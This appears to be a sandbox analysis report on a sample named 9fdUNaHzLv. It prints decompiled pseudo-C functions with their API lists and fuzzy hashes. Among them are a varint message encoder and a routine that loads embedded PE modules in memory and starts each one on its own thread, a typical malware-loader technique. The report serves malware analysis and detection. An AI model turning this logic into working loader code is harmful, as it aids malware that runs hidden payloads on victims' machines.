                                                                                        				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
                                                                                        				_t33 = _t15;
                                                                                        				if(_t33 == 0) {
                                                                                        					return _t15;
                                                                                        				} else {
                                                                                        					 *_t33 =  *_t31;
                                                                                        					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
                                                                                        					_t4 = _t33 + 0x10; // 0x10
                                                                                        					_t29 = _t4;
                                                                                        					 *(_t33 + 8) = _t29;
                                                                                        					 *(_t33 + 0xc) =  *(_t31 + 0xc);
                                                                                        					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
                                                                                        					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
                                                                                        					if(_t32 == 0) {
                                                                                        						L5:
                                                                                        						return HeapFree(GetProcessHeap(), 0, _t33);
                                                                                        					}
                                                                                        					 *(_t32 + 4) =  *_t33;
                                                                                        					_t22 = CreateThread(0, 0, E00D1A3A0, _t33, 0, 0);
                                                                                        					 *(_t32 + 8) = _t22;
                                                                                        					if(_t22 == 0) {
                                                                                        						HeapFree(GetProcessHeap(), 0, _t32);
                                                                                        						goto L5;
                                                                                        					}
                                                                                        					_t25 =  *0xd1cbd4; // 0x0
                                                                                        					 *_t32 = _t25;
                                                                                        					 *0xd1cbd4 = _t32;
                                                                                        					return _t25;
                                                                                        				}
                                                                                        			}










                                                                                        0x00d1a692
                                                                                        0x00d1a6a4
                                                                                        0x00d1a6aa
                                                                                        0x00d1a6ae
                                                                                        0x00d1a743
                                                                                        0x00d1a6b4
                                                                                        0x00d1a6b6
                                                                                        0x00d1a6bb
                                                                                        0x00d1a6be
                                                                                        0x00d1a6be
                                                                                        0x00d1a6c1
                                                                                        0x00d1a6c7
                                                                                        0x00d1a6d1
                                                                                        0x00d1a6eb
                                                                                        0x00d1a6ef
                                                                                        0x00d1a731
                                                                                        0x00000000
                                                                                        0x00d1a73b
                                                                                        0x00d1a701
                                                                                        0x00d1a704
                                                                                        0x00d1a70a
                                                                                        0x00d1a70f
                                                                                        0x00d1a72b
                                                                                        0x00000000
                                                                                        0x00d1a72b
                                                                                        0x00d1a711
                                                                                        0x00d1a716
                                                                                        0x00d1a718
                                                                                        0x00d1a720
                                                                                        0x00d1a720

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00D1A87A,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A69D
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00D1A6A4
                                                                                        • memcpy.NTDLL(00000010,?,?,?,00000000,00D1A87A,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A6D1
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A6DE
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00D1A6E5
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00D1A3A0,00000000,00000000,00000000), ref: 00D1A704
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A724
                                                                                        • HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A72B
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A734
                                                                                        • HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00D18F9A), ref: 00D1A73B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1978610079-0
                                                                                        • Opcode ID: 0243e96ce846d433deac17b7bd5fd8921f98122bd2741caa32f58692989c128d
                                                                                        • Instruction ID: 06a0a7a82b21abc47c8a10066aa17e113df275c367851b7a415ba07e70e62652
                                                                                        • Opcode Fuzzy Hash: 0243e96ce846d433deac17b7bd5fd8921f98122bd2741caa32f58692989c128d
                                                                                        • Instruction Fuzzy Hash: A72144756C0702BFE7209FA9EC09B86BBA4FB88711F108419FA59C6391CF30E491CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 41%
                                                                                        			E00D11C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v12;
                                                                                        				char _v524;
                                                                                        				intOrPtr _t19;
                                                                                        				intOrPtr _t21;
                                                                                        				intOrPtr _t31;
                                                                                        				int _t32;
                                                                                        				void* _t35;
                                                                                        				intOrPtr* _t36;
                                                                                        
                                                                                        				_t35 = 0;
                                                                                        				_v12 = 0x200;
                                                                                        				_t36 = __ecx;
                                                                                        				_t31 = __edx;
                                                                                        				_v8 = __edx;
                                                                                        				memset(__ecx, 0, 0x14);
                                                                                        				_push( &_v12);
                                                                                        				_push( &_v524);
                                                                                        				_push(0);
                                                                                        				if( *0xd1c0cc() >= 0) {
                                                                                        					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
                                                                                        					if(_t32 != 0) {
                                                                                        						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
                                                                                        						if(_t35 != 0) {
                                                                                        							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
                                                                                        						}
                                                                                        					}
                                                                                        					_t31 = _v8;
                                                                                        				}
                                                                                        				 *_t36 =  *0xd1c244(_t35, 0, 0, 0, 0);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t35);
                                                                                        				_t19 =  *_t36;
                                                                                        				if(_t19 == 0) {
                                                                                        					L9:
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t21 =  *0xd1c254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
                                                                                        					 *((intOrPtr*)(_t36 + 4)) = _t21;
                                                                                        					if(_t21 == 0) {
                                                                                        						 *0xd1c234( *_t36);
                                                                                        						goto L9;
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)(_t36 + 0xc)) = 3;
                                                                                        						return 1;
                                                                                        					}
                                                                                        				}
                                                                                        			}












                                                                                        0x00d11c5e
                                                                                        0x00d11c60
                                                                                        0x00d11c67
                                                                                        0x00d11c69
                                                                                        0x00d11c6d
                                                                                        0x00d11c70
                                                                                        0x00d11c7c
                                                                                        0x00d11c83
                                                                                        0x00d11c84
                                                                                        0x00d11c8d
                                                                                        0x00d11ca2
                                                                                        0x00d11ca6
                                                                                        0x00d11cbb
                                                                                        0x00d11cbf
                                                                                        0x00d11cd0
                                                                                        0x00d11cd0
                                                                                        0x00d11cbf
                                                                                        0x00d11cd6
                                                                                        0x00d11cd6
                                                                                        0x00d11ceb
                                                                                        0x00d11cf4
                                                                                        0x00d11cfa
                                                                                        0x00d11cfe
                                                                                        0x00d11d39
                                                                                        0x00d11d3f
                                                                                        0x00d11d00
                                                                                        0x00d11d0f
                                                                                        0x00d11d15
                                                                                        0x00d11d1a
                                                                                        0x00d11d31
                                                                                        0x00000000
                                                                                        0x00d11d1d
                                                                                        0x00d11d1d
                                                                                        0x00d11d2e
                                                                                        0x00d11d2e
                                                                                        0x00d11d1a

                                                                                        APIs
                                                                                        • memset.NTDLL ref: 00D11C70
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D11C9C
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D11CAE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D11CB5
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D11CD0
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D11CED
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11CF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
                                                                                        • String ID:
                                                                                        • API String ID: 4040929015-0
                                                                                        • Opcode ID: 145f45ec0cc6b41a4007eca571618b6a200b58e5e3369e4fe429979dd33c7aa8
                                                                                        • Instruction ID: 487dd406b011bc961e48c5ee0b866d803858072c734ae378ce1ce2ef8c8d0031
                                                                                        • Opcode Fuzzy Hash: 145f45ec0cc6b41a4007eca571618b6a200b58e5e3369e4fe429979dd33c7aa8
                                                                                        • Instruction Fuzzy Hash: C731A075680304BBF7204FA5AC49FEBBBBCEB85B10F104169BA14D62D1DF7099818BB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D19F80(intOrPtr* __ecx, unsigned int* __edx) {
                                                                                        				intOrPtr _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr* _v16;
                                                                                        				unsigned int _t37;
                                                                                        				unsigned int _t38;
                                                                                        				unsigned int _t39;
                                                                                        				unsigned int _t40;
                                                                                        				unsigned int _t41;
                                                                                        				long _t50;
                                                                                        				signed char _t61;
                                                                                        				signed char _t63;
                                                                                        				signed char _t65;
                                                                                        				signed char _t67;
                                                                                        				signed char _t69;
                                                                                        				intOrPtr _t71;
                                                                                        				intOrPtr* _t72;
                                                                                        				int _t73;
                                                                                        				int _t74;
                                                                                        				int _t75;
                                                                                        				intOrPtr _t77;
                                                                                        				signed char _t78;
                                                                                        				signed char _t80;
                                                                                        				signed char _t82;
                                                                                        				signed char _t84;
                                                                                        				signed char _t86;
                                                                                        				intOrPtr _t89;
                                                                                        				void* _t90;
                                                                                        				void* _t91;
                                                                                        				void* _t92;
                                                                                        				int _t93;
                                                                                        				signed char* _t94;
                                                                                        				void* _t95;
                                                                                        				intOrPtr _t96;
                                                                                        				char* _t99;
                                                                                        				signed char* _t100;
                                                                                        				signed char* _t101;
                                                                                        				void* _t102;
                                                                                        				char* _t103;
                                                                                        				signed char* _t104;
                                                                                        				void* _t105;
                                                                                        				char* _t106;
                                                                                        				signed char* _t107;
                                                                                        				void* _t108;
                                                                                        				char* _t109;
                                                                                        				signed char* _t110;
                                                                                        
                                                                                        				_t94 = __edx;
                                                                                        				_v16 = __ecx;
                                                                                        				_t96 = 1;
                                                                                        				_v12 = 1;
                                                                                        				_t37 =  *__edx;
                                                                                        				if(_t37 > 0x7f) {
                                                                                        					do {
                                                                                        						_t37 = _t37 >> 7;
                                                                                        						_t96 = _t96 + 1;
                                                                                        					} while (_t37 > 0x7f);
                                                                                        					_v12 = _t96;
                                                                                        				}
                                                                                        				_t4 =  &(_t94[8]); // 0x0
                                                                                        				_t38 =  *_t4;
                                                                                        				_t77 = 1;
                                                                                        				while(_t38 > 0x7f) {
                                                                                        					_t38 = _t38 >> 7;
                                                                                        					_t77 = _t77 + 1;
                                                                                        				}
                                                                                        				_t5 =  &(_t94[0x18]); // 0x0
                                                                                        				_t39 =  *_t5;
                                                                                        				_t89 = 1;
                                                                                        				while(_t39 > 0x7f) {
                                                                                        					_t39 = _t39 >> 7;
                                                                                        					_t89 = _t89 + 1;
                                                                                        				}
                                                                                        				_t6 =  &(_t94[0x20]); // 0x0
                                                                                        				_t40 =  *_t6;
                                                                                        				_t71 = 1;
                                                                                        				while(_t40 > 0x7f) {
                                                                                        					_t40 = _t40 >> 7;
                                                                                        					_t71 = _t71 + 1;
                                                                                        				}
                                                                                        				_t7 =  &(_t94[0x28]); // 0x0
                                                                                        				_t41 =  *_t7;
                                                                                        				_v8 = 1;
                                                                                        				while(_t41 > 0x7f) {
                                                                                        					_v8 = _v8 + 1;
                                                                                        					_t41 = _t41 >> 7;
                                                                                        				}
                                                                                        				_t11 =  &(_t94[0x28]); // 0x0
                                                                                        				_t12 =  &(_t94[0x20]); // 0x0
                                                                                        				_t13 =  &(_t94[0x18]); // 0x0
                                                                                        				_t14 =  &(_t94[8]); // 0x0
                                                                                        				_t72 = _v16;
                                                                                        				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
                                                                                        				 *(_t72 + 4) = _t50;
                                                                                        				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
                                                                                        				 *_t72 = _t99;
                                                                                        				if(_t99 != 0) {
                                                                                        					 *_t99 = 8;
                                                                                        					_t100 = _t99 + 1;
                                                                                        					_t78 =  *_t94;
                                                                                        					while(_t78 > 0x7f) {
                                                                                        						_t69 = _t78;
                                                                                        						_t78 = _t78 >> 7;
                                                                                        						 *_t100 = _t69 | 0x00000080;
                                                                                        						_t100 =  &(_t100[1]);
                                                                                        					}
                                                                                        					 *_t100 = _t78 & 0x0000007f;
                                                                                        					_t100[1] = 0x12;
                                                                                        					_t101 =  &(_t100[2]);
                                                                                        					_t20 =  &(_t94[8]); // 0x0
                                                                                        					_t73 =  *_t20;
                                                                                        					_t80 = _t73;
                                                                                        					_t21 =  &(_t94[4]); // 0x0
                                                                                        					_t90 =  *_t21;
                                                                                        					if(_t73 > 0x7f) {
                                                                                        						do {
                                                                                        							_t67 = _t80;
                                                                                        							_t80 = _t80 >> 7;
                                                                                        							 *_t101 = _t67 | 0x00000080;
                                                                                        							_t101 =  &(_t101[1]);
                                                                                        						} while (_t80 > 0x7f);
                                                                                        					}
                                                                                        					 *_t101 = _t80 & 0x0000007f;
                                                                                        					_t102 =  &(_t101[1]);
                                                                                        					memcpy(_t102, _t90, _t73);
                                                                                        					_t103 = _t102 + _t73;
                                                                                        					 *_t103 = 0x1d;
                                                                                        					_t22 =  &(_t94[0xc]); // 0x0
                                                                                        					 *(_t103 + 1) =  *_t22;
                                                                                        					 *((char*)(_t103 + 5)) = 0x25;
                                                                                        					_t25 =  &(_t94[0x10]); // 0x0
                                                                                        					 *(_t103 + 6) =  *_t25;
                                                                                        					 *((char*)(_t103 + 0xa)) = 0x2a;
                                                                                        					_t104 = _t103 + 0xb;
                                                                                        					_t28 =  &(_t94[0x18]); // 0x0
                                                                                        					_t74 =  *_t28;
                                                                                        					_t82 = _t74;
                                                                                        					_t29 =  &(_t94[0x14]); // 0x0
                                                                                        					_t91 =  *_t29;
                                                                                        					if(_t74 > 0x7f) {
                                                                                        						do {
                                                                                        							_t65 = _t82;
                                                                                        							_t82 = _t82 >> 7;
                                                                                        							 *_t104 = _t65 | 0x00000080;
                                                                                        							_t104 =  &(_t104[1]);
                                                                                        						} while (_t82 > 0x7f);
                                                                                        					}
                                                                                        					 *_t104 = _t82 & 0x0000007f;
                                                                                        					_t105 =  &(_t104[1]);
                                                                                        					memcpy(_t105, _t91, _t74);
                                                                                        					_t106 = _t105 + _t74;
                                                                                        					 *_t106 = 0x32;
                                                                                        					_t107 = _t106 + 1;
                                                                                        					_t30 =  &(_t94[0x20]); // 0x0
                                                                                        					_t75 =  *_t30;
                                                                                        					_t84 = _t75;
                                                                                        					_t31 =  &(_t94[0x1c]); // 0x0
                                                                                        					_t92 =  *_t31;
                                                                                        					if(_t75 > 0x7f) {
                                                                                        						do {
                                                                                        							_t63 = _t84;
                                                                                        							_t84 = _t84 >> 7;
                                                                                        							 *_t107 = _t63 | 0x00000080;
                                                                                        							_t107 =  &(_t107[1]);
                                                                                        						} while (_t84 > 0x7f);
                                                                                        					}
                                                                                        					 *_t107 = _t84 & 0x0000007f;
                                                                                        					_t108 =  &(_t107[1]);
                                                                                        					memcpy(_t108, _t92, _t75);
                                                                                        					_t109 = _t108 + _t75;
                                                                                        					 *_t109 = 0x3a;
                                                                                        					_t110 = _t109 + 1;
                                                                                        					_t32 =  &(_t94[0x28]); // 0x0
                                                                                        					_t93 =  *_t32;
                                                                                        					_t86 = _t93;
                                                                                        					_t33 =  &(_t94[0x24]); // 0x0
                                                                                        					_t95 =  *_t33;
                                                                                        					if(_t93 > 0x7f) {
                                                                                        						do {
                                                                                        							_t61 = _t86;
                                                                                        							_t86 = _t86 >> 7;
                                                                                        							 *_t110 = _t61 | 0x00000080;
                                                                                        							_t110 =  &(_t110[1]);
                                                                                        						} while (_t86 > 0x7f);
                                                                                        					}
                                                                                        					 *_t110 = _t86 & 0x0000007f;
                                                                                        					memcpy( &(_t110[1]), _t95, _t93);
                                                                                        					_t72 = _v16;
                                                                                        				}
                                                                                        				return 0 |  *_t72 != 0x00000000;
                                                                                        			}
















































                                                                                        0x00d19f89
                                                                                        0x00d19f8b
                                                                                        0x00d19f8e
                                                                                        0x00d19f93
                                                                                        0x00d19f96
                                                                                        0x00d19f9b
                                                                                        0x00d19fa0
                                                                                        0x00d19fa0
                                                                                        0x00d19fa3
                                                                                        0x00d19fa4
                                                                                        0x00d19fa9
                                                                                        0x00d19fa9
                                                                                        0x00d19fac
                                                                                        0x00d19fac
                                                                                        0x00d19faf
                                                                                        0x00d19fb7
                                                                                        0x00d19fc0
                                                                                        0x00d19fc3
                                                                                        0x00d19fc4
                                                                                        0x00d19fc9
                                                                                        0x00d19fc9
                                                                                        0x00d19fcc
                                                                                        0x00d19fd4
                                                                                        0x00d19fd6
                                                                                        0x00d19fd9
                                                                                        0x00d19fda
                                                                                        0x00d19fdf
                                                                                        0x00d19fdf
                                                                                        0x00d19fe2
                                                                                        0x00d19fea
                                                                                        0x00d19ff0
                                                                                        0x00d19ff3
                                                                                        0x00d19ff4
                                                                                        0x00d19ff9
                                                                                        0x00d19ff9
                                                                                        0x00d19ffc
                                                                                        0x00d1a006
                                                                                        0x00d1a010
                                                                                        0x00d1a013
                                                                                        0x00d1a016
                                                                                        0x00d1a01b
                                                                                        0x00d1a01e
                                                                                        0x00d1a021
                                                                                        0x00d1a024
                                                                                        0x00d1a02f
                                                                                        0x00d1a039
                                                                                        0x00d1a03e
                                                                                        0x00d1a04e
                                                                                        0x00d1a050
                                                                                        0x00d1a054
                                                                                        0x00d1a05a
                                                                                        0x00d1a05d
                                                                                        0x00d1a05e
                                                                                        0x00d1a063
                                                                                        0x00d1a065
                                                                                        0x00d1a067
                                                                                        0x00d1a06c
                                                                                        0x00d1a06e
                                                                                        0x00d1a06f
                                                                                        0x00d1a077
                                                                                        0x00d1a079
                                                                                        0x00d1a07d
                                                                                        0x00d1a080
                                                                                        0x00d1a080
                                                                                        0x00d1a083
                                                                                        0x00d1a085
                                                                                        0x00d1a085
                                                                                        0x00d1a08b
                                                                                        0x00d1a090
                                                                                        0x00d1a090
                                                                                        0x00d1a092
                                                                                        0x00d1a097
                                                                                        0x00d1a099
                                                                                        0x00d1a09a
                                                                                        0x00d1a090
                                                                                        0x00d1a0a3
                                                                                        0x00d1a0a5
                                                                                        0x00d1a0a8
                                                                                        0x00d1a0ae
                                                                                        0x00d1a0b3
                                                                                        0x00d1a0b6
                                                                                        0x00d1a0b9
                                                                                        0x00d1a0bc
                                                                                        0x00d1a0c0
                                                                                        0x00d1a0c3
                                                                                        0x00d1a0c6
                                                                                        0x00d1a0ca
                                                                                        0x00d1a0cd
                                                                                        0x00d1a0cd
                                                                                        0x00d1a0d0
                                                                                        0x00d1a0d2
                                                                                        0x00d1a0d2
                                                                                        0x00d1a0d8
                                                                                        0x00d1a0e0
                                                                                        0x00d1a0e0
                                                                                        0x00d1a0e2
                                                                                        0x00d1a0e7
                                                                                        0x00d1a0e9
                                                                                        0x00d1a0ea
                                                                                        0x00d1a0e0
                                                                                        0x00d1a0f3
                                                                                        0x00d1a0f5
                                                                                        0x00d1a0f8
                                                                                        0x00d1a0fe
                                                                                        0x00d1a103
                                                                                        0x00d1a106
                                                                                        0x00d1a107
                                                                                        0x00d1a107
                                                                                        0x00d1a10a
                                                                                        0x00d1a10c
                                                                                        0x00d1a10c
                                                                                        0x00d1a112
                                                                                        0x00d1a114
                                                                                        0x00d1a114
                                                                                        0x00d1a116
                                                                                        0x00d1a11b
                                                                                        0x00d1a11d
                                                                                        0x00d1a11e
                                                                                        0x00d1a114
                                                                                        0x00d1a127
                                                                                        0x00d1a129
                                                                                        0x00d1a12c
                                                                                        0x00d1a132
                                                                                        0x00d1a137
                                                                                        0x00d1a13a
                                                                                        0x00d1a13b
                                                                                        0x00d1a13b
                                                                                        0x00d1a13e
                                                                                        0x00d1a140
                                                                                        0x00d1a140
                                                                                        0x00d1a146
                                                                                        0x00d1a148
                                                                                        0x00d1a148
                                                                                        0x00d1a14a
                                                                                        0x00d1a14f
                                                                                        0x00d1a151
                                                                                        0x00d1a152
                                                                                        0x00d1a148
                                                                                        0x00d1a15b
                                                                                        0x00d1a160
                                                                                        0x00d1a166
                                                                                        0x00d1a169
                                                                                        0x00d1a179

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 00D1A041
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00D1A048
                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 00D1A0A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcessmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1874444438-0
                                                                                        • Opcode ID: 750fcf721e333b0d9178625eea84533a04d8445f2f1aadafa110fde9714ffd51
                                                                                        • Instruction ID: 997a15e1fa2a3561fd280f094454b0f498fe44c3278dff5eebc22d5883a5ebac
                                                                                        • Opcode Fuzzy Hash: 750fcf721e333b0d9178625eea84533a04d8445f2f1aadafa110fde9714ffd51
                                                                                        • Instruction Fuzzy Hash: DA61C470900651BFD3248E18D49079AFBE4FF2A750F28456DE889C7B06C724A9D6D7A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D18990(signed char __ecx, void* __edx) {
                                                                                        				intOrPtr _v8;
                                                                                        				signed int _v12;
                                                                                        				signed char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				void* _v24;
                                                                                        				char _v28;
                                                                                        				signed char _t25;
                                                                                        				void* _t31;
                                                                                        				intOrPtr _t34;
                                                                                        				void* _t36;
                                                                                        				void _t38;
                                                                                        				signed char _t39;
                                                                                        				signed char _t41;
                                                                                        				signed int _t47;
                                                                                        				intOrPtr _t50;
                                                                                        				void* _t51;
                                                                                        				signed char _t52;
                                                                                        
                                                                                        				_t52 = __ecx;
                                                                                        				_t50 = __ecx + __edx;
                                                                                        				_v8 = _t50;
                                                                                        				while(1) {
                                                                                        					_t47 = 0;
                                                                                        					_t41 = 0;
                                                                                        					_v12 = 0;
                                                                                        					_t39 = 0x80;
                                                                                        					if(_t52 >= _t50) {
                                                                                        						goto L6;
                                                                                        					} else {
                                                                                        						goto L3;
                                                                                        					}
                                                                                        					while(1) {
                                                                                        						L3:
                                                                                        						_t39 =  *_t52;
                                                                                        						_t52 = _t52 + 1;
                                                                                        						_t47 = _t47 | (_t39 & 0x7f) << _t41;
                                                                                        						if(_t39 >= 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_t41 = _t41 + 7;
                                                                                        						if(_t52 < _t50) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						break;
                                                                                        					}
                                                                                        					_v12 = _t47;
                                                                                        					L6:
                                                                                        					_t25 =  !((_t39 & 0x000000ff) >> 7);
                                                                                        					if((_t25 & 0x00000001) != 0) {
                                                                                        						_t25 = _t47 + _t52;
                                                                                        						if(_t25 <= _t50) {
                                                                                        							_v16 = _t52;
                                                                                        							_t52 = _t25;
                                                                                        							_t25 = E00D187C0( &_v16,  &_v28);
                                                                                        							if(_t25 != 0) {
                                                                                        								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
                                                                                        								if(_t51 == 0) {
                                                                                        									L1:
                                                                                        									_t50 = _v8;
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									_t31 = E00D11F40(_v24, _v20);
                                                                                        									 *(_t51 + 8) = _t31;
                                                                                        									if(_t31 == 0) {
                                                                                        										L15:
                                                                                        										HeapFree(GetProcessHeap(), 0, _t51);
                                                                                        										goto L1;
                                                                                        									} else {
                                                                                        										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
                                                                                        										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
                                                                                        										if(_t34 == 0) {
                                                                                        											L14:
                                                                                        											VirtualFree( *(_t51 + 8), 0, 0x8000);
                                                                                        											goto L15;
                                                                                        										} else {
                                                                                        											_t36 = CreateThread(0, 0, E00D18880, _t51, 0, 0);
                                                                                        											 *(_t51 + 0x10) = _t36;
                                                                                        											if(_t36 == 0) {
                                                                                        												goto L14;
                                                                                        											} else {
                                                                                        												 *((intOrPtr*)(_t51 + 4)) = _v28;
                                                                                        												_t38 =  *0xd1c274; // 0x0
                                                                                        												 *_t51 = _t38;
                                                                                        												 *0xd1c274 = _t51;
                                                                                        												goto L1;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								L17:
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					return _t25;
                                                                                        					goto L17;
                                                                                        				}
                                                                                        			}




















                                                                                        0x00d18998
                                                                                        0x00d1899b
                                                                                        0x00d1899e
                                                                                        0x00d189a6
                                                                                        0x00d189a6
                                                                                        0x00d189a8
                                                                                        0x00d189aa
                                                                                        0x00d189ad
                                                                                        0x00d189b1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d189b3
                                                                                        0x00d189b3
                                                                                        0x00d189b3
                                                                                        0x00d189b5
                                                                                        0x00d189be
                                                                                        0x00d189c2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d189c4
                                                                                        0x00d189c9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d189c9
                                                                                        0x00d189cb
                                                                                        0x00d189ce
                                                                                        0x00d189d4
                                                                                        0x00d189d8
                                                                                        0x00d189de
                                                                                        0x00d189e3
                                                                                        0x00d189e9
                                                                                        0x00d189f2
                                                                                        0x00d189f4
                                                                                        0x00d189fb
                                                                                        0x00d18a12
                                                                                        0x00d18a16
                                                                                        0x00d189a3
                                                                                        0x00d189a3
                                                                                        0x00000000
                                                                                        0x00d18a18
                                                                                        0x00d18a1e
                                                                                        0x00d18a23
                                                                                        0x00d18a28
                                                                                        0x00d18a7b
                                                                                        0x00d18a85
                                                                                        0x00000000
                                                                                        0x00d18a2a
                                                                                        0x00d18a31
                                                                                        0x00d18a33
                                                                                        0x00d18a36
                                                                                        0x00d18a6b
                                                                                        0x00d18a75
                                                                                        0x00000000
                                                                                        0x00d18a38
                                                                                        0x00d18a46
                                                                                        0x00d18a4c
                                                                                        0x00d18a51
                                                                                        0x00000000
                                                                                        0x00d18a53
                                                                                        0x00d18a56
                                                                                        0x00d18a59
                                                                                        0x00d18a5e
                                                                                        0x00d18a60
                                                                                        0x00000000
                                                                                        0x00d18a60
                                                                                        0x00d18a51
                                                                                        0x00d18a36
                                                                                        0x00d18a28
                                                                                        0x00000000
                                                                                        0x00d18a16
                                                                                        0x00d189fb
                                                                                        0x00d189e3
                                                                                        0x00d18a96
                                                                                        0x00000000
                                                                                        0x00d18a96

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,00D18F82), ref: 00D18A05
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00D18A0C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00D18880,00000000,00000000,00000000), ref: 00D18A46
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,00D18F82), ref: 00D18A75
